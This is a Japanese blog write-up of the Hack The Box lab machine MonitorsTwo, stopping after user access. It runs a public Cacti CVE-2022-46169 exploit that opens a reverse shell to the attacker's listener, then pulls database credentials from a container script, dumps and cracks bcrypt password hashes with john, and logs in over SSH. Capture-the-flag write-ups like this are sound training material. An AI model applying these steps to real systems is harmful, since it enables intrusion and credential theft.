🐹

[Hack The Box]Monitors2 writeup

2023/12/10に公開

USER PRIVILEGES

nmap

┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ sudo nmap -n -v -T4 --min-rate 10000 10.10.11.189 -sSV -Pn
[sudo] kali のパスワード:
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times may be slower.
Starting Nmap 7.94 ( https://nmap.org ) at 2023-12-10 18:46 JST
NSE: Loaded 46 scripts for scanning.
Initiating SYN Stealth Scan at 18:46
Scanning 10.10.11.189 [1000 ports]
Completed SYN Stealth Scan at 18:46, 1.12s elapsed (1000 total ports)
Initiating Service scan at 18:46
NSE: Script scanning 10.10.11.189.
Initiating NSE at 18:46
Completed NSE at 18:46, 0.00s elapsed
Initiating NSE at 18:46
Completed NSE at 18:46, 0.00s elapsed
Nmap scan report for 10.10.11.189
Host is up.
All 1000 scanned ports on 10.10.11.189 are in ignored states.
Not shown: 1000 filtered tcp ports (no-response)

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 1.50 seconds
           Raw packets sent: 2000 (88.000KB) | Rcvd: 0 (0B)

ffuf

┌──(kali㉿kali)-[/home/kali.org]
└─$ ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://10.10.11.211/FUZZ -c -v 

        /'___\  /'___\           /'___\       
       /\ \__/ /\ \__/  __  __  /\ \__/       
       \ \ ,__\\ \ ,__\/\ \/\ \ \ \ ,__\      
        \ \ \_/ \ \ \_/\ \ \_\ \ \ \ \_/      
         \ \_\   \ \_\  \ \____/  \ \_\       
          \/_/    \/_/   \/___/    \/_/       

       v2.0.0-dev
________________________________________________

 :: Method           : GET
 :: URL              : http://10.10.11.211/FUZZ
 :: Wordlist         : FUZZ: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
 :: Follow redirects : false
 :: Calibration      : false
 :: Timeout          : 10
 :: Threads          : 40
 :: Matcher          : Response status: 200,204,301,302,307,401,403,405,500
________________________________________________

[Status: 200, Size: 13844, Words: 600, Lines: 273, Duration: 476ms]
| URL | http://10.10.11.211/#
    * FUZZ: #

/CHANGELOGpluginsなど面白そうなものは見つかったが有益な情報は得られず

web enumeration

Cacti Untuthenticated RCE(CVE-2022-46169)

この記事によるとCacti<=1.2.22での認証バイパスとコマンドインジェクションを連鎖させた脆弱性があるらしい

CVE-2022-46169.pyの使い方はこうだ

┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ python3 CVE-2022-46169.py -h                    
Usage: CVE-2022-46169.py [options]

Options:
  -h, --help            show this help message and exit
  -u URL_TARGET, --url=URL_TARGET
                        The url target
  --LHOST=LHOST         Your ip
  --LPORT=LPORT         The listening port
┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2/CVE-2022-46169-CACTI-1.2.22]
└─$ python3 CVE-2022-46169.py -u http://10.10.11.211 --LHOST=10.10.14.36 --LPORT=4444
Checking...
The target is vulnerable. Exploiting...
Bruteforcing the host_id and local_data_ids
Bruteforce Success!!

ncでリッスンする

┌──(kali㉿kali)-[/home/kali.org]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.36] from (UNKNOWN) [10.10.11.211] 54826
bash: cannot set terminal process group (1): Inappropriate ioctl for device
bash: no job control in this shell
www-data@50bca5e748b0:/var/www/html$ 

返ってきた!!
中を探索して、/homeなどを確認するがuser.txtは見当たらず…
するとルートディレクトリにentrypoint.shなるものを発見した

www-data@50bca5e748b0:/$ ll
total 84
drwxr-xr-x   1 root root 4096 Mar 21  2023 .
drwxr-xr-x   1 root root 4096 Mar 21  2023 ..
-rwxr-xr-x   1 root root    0 Mar 21  2023 .dockerenv
drwxr-xr-x   1 root root 4096 Mar 22  2023 bin
drwxr-xr-x   2 root root 4096 Mar 22  2023 boot
drwxr-xr-x   5 root root  340 Dec 10 08:08 dev
-rw-r--r--   1 root root  648 Jan  5  2023 entrypoint.sh
drwxr-xr-x   1 root root 4096 Mar 21  2023 etc
drwxr-xr-x   2 root root 4096 Mar 22  2023 home
drwxr-xr-x   1 root root 4096 Nov 15  2022 lib
drwxr-xr-x   2 root root 4096 Mar 22  2023 lib64
drwxr-xr-x   2 root root 4096 Mar 22  2023 media
drwxr-xr-x   2 root root 4096 Mar 22  2023 mnt
drwxr-xr-x   2 root root 4096 Mar 22  2023 opt
dr-xr-xr-x 274 root root    0 Dec 10 08:08 proc
drwx------   1 root root 4096 Mar 21  2023 root
drwxr-xr-x   1 root root 4096 Nov 15  2022 run
drwxr-xr-x   1 root root 4096 Jan  9  2023 sbin
drwxr-xr-x   2 root root 4096 Mar 22  2023 srv
dr-xr-xr-x  13 root root    0 Dec 10 08:08 sys
drwxrwxrwt   1 root root 4096 Dec 10 09:30 tmp
drwxr-xr-x   1 root root 4096 Nov 14  2022 usr
drwxr-xr-x   1 root root 4096 Nov 15  2022 var
entrypoint.sh
#!/bin/bash
set -ex

wait-for-it db:3306 -t 300 -- echo "database is connected"
if [[ ! $(mysql --host=db --user=root --password=root cacti -e "show tables") =~ "automation_devices" ]]; then
    mysql --host=db --user=root --password=root cacti < /var/www/html/cacti.sql
    mysql --host=db --user=root --password=root cacti -e "UPDATE user_auth SET must_change_password='' WHERE username = 'admin'"
    mysql --host=db --user=root --password=root cacti -e "SET GLOBAL time_zone = 'UTC'"
fi
mysql --host=db --user=root --password=root cacti -e "show tables;"
< --user=root --password=root cacti -e "show tables;"   
+-------------------------------------+
| Tables_in_cacti                     |
+-------------------------------------+
| aggregate_graph_templates           |
| aggregate_graph_templates_graph     |
| aggregate_graph_templates_item      |
| aggregate_graphs                    |
| aggregate_graphs_graph_item         |
| aggregate_graphs_items              |
| automation_devices                  |
| automation_graph_rule_items         |
| automation_graph_rules              |
| automation_ips                      |
| automation_match_rule_items         |
| automation_networks                 |
| automation_processes                |
| automation_snmp                     |
| automation_snmp_items               |
| automation_templates                |
| automation_tree_rule_items          |
| automation_tree_rules               |
| cdef                                |
| cdef_items                          |
| color_template_items                |
| color_templates                     |
| colors                              |
| data_debug                          |
| data_input                          |
| data_input_data                     |
| data_input_fields                   |
| data_local                          |
| data_source_profiles                |
| data_source_profiles_cf             |
| data_source_profiles_rra            |
| data_source_purge_action            |
| data_source_purge_temp              |
| data_source_stats_daily             |
| data_source_stats_hourly            |
| data_source_stats_hourly_cache      |
| data_source_stats_hourly_last       |
| data_source_stats_monthly           |
| data_source_stats_weekly            |
| data_source_stats_yearly            |
| data_template                       |
| data_template_data                  |
| data_template_rrd                   |
| external_links                      |
| graph_local                         |
| graph_template_input                |
| graph_template_input_defs           |
| graph_templates                     |
| graph_templates_gprint              |
| graph_templates_graph               |
| graph_templates_item                |
| graph_tree                          |
| graph_tree_items                    |
| host                                |
| host_graph                          |
| host_snmp_cache                     |
| host_snmp_query                     |
| host_template                       |
| host_template_graph                 |
| host_template_snmp_query            |
| plugin_config                       |
| plugin_db_changes                   |
| plugin_hooks                        |
| plugin_realms                       |
| poller                              |
| poller_command                      |
| poller_data_template_field_mappings |
| poller_item                         |
| poller_output                       |
| poller_output_boost                 |
| poller_output_boost_local_data_ids  |
| poller_output_boost_processes       |
| poller_output_realtime              |
| poller_reindex                      |
| poller_resource_cache               |
| poller_time                         |
| processes                           |
| reports                             |
| reports_items                       |
| sessions                            |
| settings                            |
| settings_tree                       |
| settings_user                       |
| settings_user_group                 |
| sites                               |
| snmp_query                          |
| snmp_query_graph                    |
| snmp_query_graph_rrd                |
| snmp_query_graph_rrd_sv             |
| snmp_query_graph_sv                 |
| snmpagent_cache                     |
| snmpagent_cache_notifications       |
| snmpagent_cache_textual_conventions |
| snmpagent_managers                  |
| snmpagent_managers_notifications    |
| snmpagent_mibs                      |
| snmpagent_notifications_log         |
| user_auth                           |
| user_auth_cache                     |
| user_auth_group                     |
| user_auth_group_members             |
| user_auth_group_perms               |
| user_auth_group_realm               |
| user_auth_perms                     |
| user_auth_realm                     |
| user_domains                        |
| user_domains_ldap                   |
| user_log                            |
| vdef                                |
| vdef_items                          |
| version                             |
+-------------------------------------+
mysql --host=db --user=root --password=root cacti -e "select * from user_auth"
<--user=root --password=root cacti -e "select * from user_auth;"
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
| id | username | password                                                     | realm | full_name      | email_address          | must_change_password | password_change | show_tree | show_list | show_preview | graph_settings | login_opts | policy_graphs | policy_trees | policy_hosts | policy_graph_templates | enabled | lastchange | lastlogin | password_history | locked | failed_attempts | lastfail | reset_perms |
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+
|  1 | admin    | $2y$10$IhEA.Og8vrvwueM7VEDkUes3pwc3zaBbQ/iuqMft/llx8utpR1hjC |     0 | Jamie Thompson | admin@monitorstwo.htb  |                      | on              | on        | on        | on           | on             |          2 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 | -1               |        |               0 |        0 |   663348655 |
|  3 | guest    | 43e9a4ab75570f5b                                             |     0 | Guest Account  |                        | on                   | on              | on        | on        | on           | 3              |          1 |             1 |            1 |            1 |                      1 |         |         -1 |        -1 | -1               |        |               0 |        0 |           0 |
|  4 | marcus   | $2y$10$vcrYth5YcCLlZaPDj6PwqOYTw68W1.3WeKlBn70JonsdW/MhFYK4C |     0 | Marcus Brune   | marcus@monitorstwo.htb |                      |                 | on        | on        | on           | on             |          1 |             1 |            1 |            1 |                      1 | on      |         -1 |        -1 |                  | on     |               0 |        0 |  2135691668 |
+----+----------+--------------------------------------------------------------+-------+----------------+------------------------+----------------------+-----------------+-----------+-----------+--------------+----------------+------------+---------------+--------------+--------------+------------------------+---------+------------+-----------+------------------+--------+-----------------+----------+-------------+

john the ripper

ハッシュ値をクラックするツールであるjohnを使う
hashcatでも同様のことができる
adminguestのパスワードでもクラックしてみたが、結果上手くいったのはmarcusのパスワードだった

┌──(kali㉿kali)-[/home/kali.org/Machine/monitor2]
└─$ john --wordlist=/usr/share/wordlists/rockyou.txt marcus.txt
Using default input encoding: UTF-8
Loaded 1 password hash (bcrypt [Blowfish 32/64 X3])
Cost 1 (iteration count) is 1024 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
funkymonkey      (?)     
1g 0:00:01:31 DONE (2023-12-10 18:41) 0.01096g/s 93.52p/s 93.52c/s 93.52C/s 474747..coucou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

あとはsshで接続したらよいだけですね

┌──(kali㉿kali)-[/home/kali.org]
└─$ ssh marcus@10.10.11.211
The authenticity of host '10.10.11.211 (10.10.11.211)' can't be established.
ED25519 key fingerprint is SHA256:RoZ8jwEnGGByxNt04+A/cdluslAwhmiWqG3ebyZko+A.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.211' (ED25519) to the list of known hosts.
marcus@10.10.11.211's password: 
Welcome to Ubuntu 20.04.6 LTS (GNU/Linux 5.4.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Mon 11 Dec 2023 06:04:35 AM UTC

  System load:                      0.08
  Usage of /:                       63.8% of 6.73GB
  Memory usage:                     22%
  Swap usage:                       0%
  Processes:                        240
  Users logged in:                  0
  IPv4 address for br-60ea49c21773: 172.18.0.1
  IPv4 address for br-7c3b7c0d00b3: 172.19.0.1
  IPv4 address for docker0:         172.17.0.1
  IPv4 address for eth0:            10.10.11.211
  IPv6 address for eth0:            dead:beef::250:56ff:feb9:dd85


Expanded Security Maintenance for Applications is not enabled.

0 updates can be applied immediately.

Enable ESM Apps to receive additional future security updates.
See https://ubuntu.com/esm or run: sudo pro status


The list of available updates is more than a week old.
To check for new updates run: sudo apt update

You have mail.
Last login: Thu Mar 23 10:12:28 2023 from 10.10.14.40
marcus@monitorstwo:~$ ls
user.txt
marcus@monitorstwo:~$ cat user.txt 

user.txtゲット!

PRIVILEGE ESCALATION

sudo -l

marcusの権限で実行できるものはなさそうですね

marcus@monitorstwo:~$ sudo -l
[sudo] password for marcus: 
Sorry, user marcus may not run sudo on localhost.

Discussion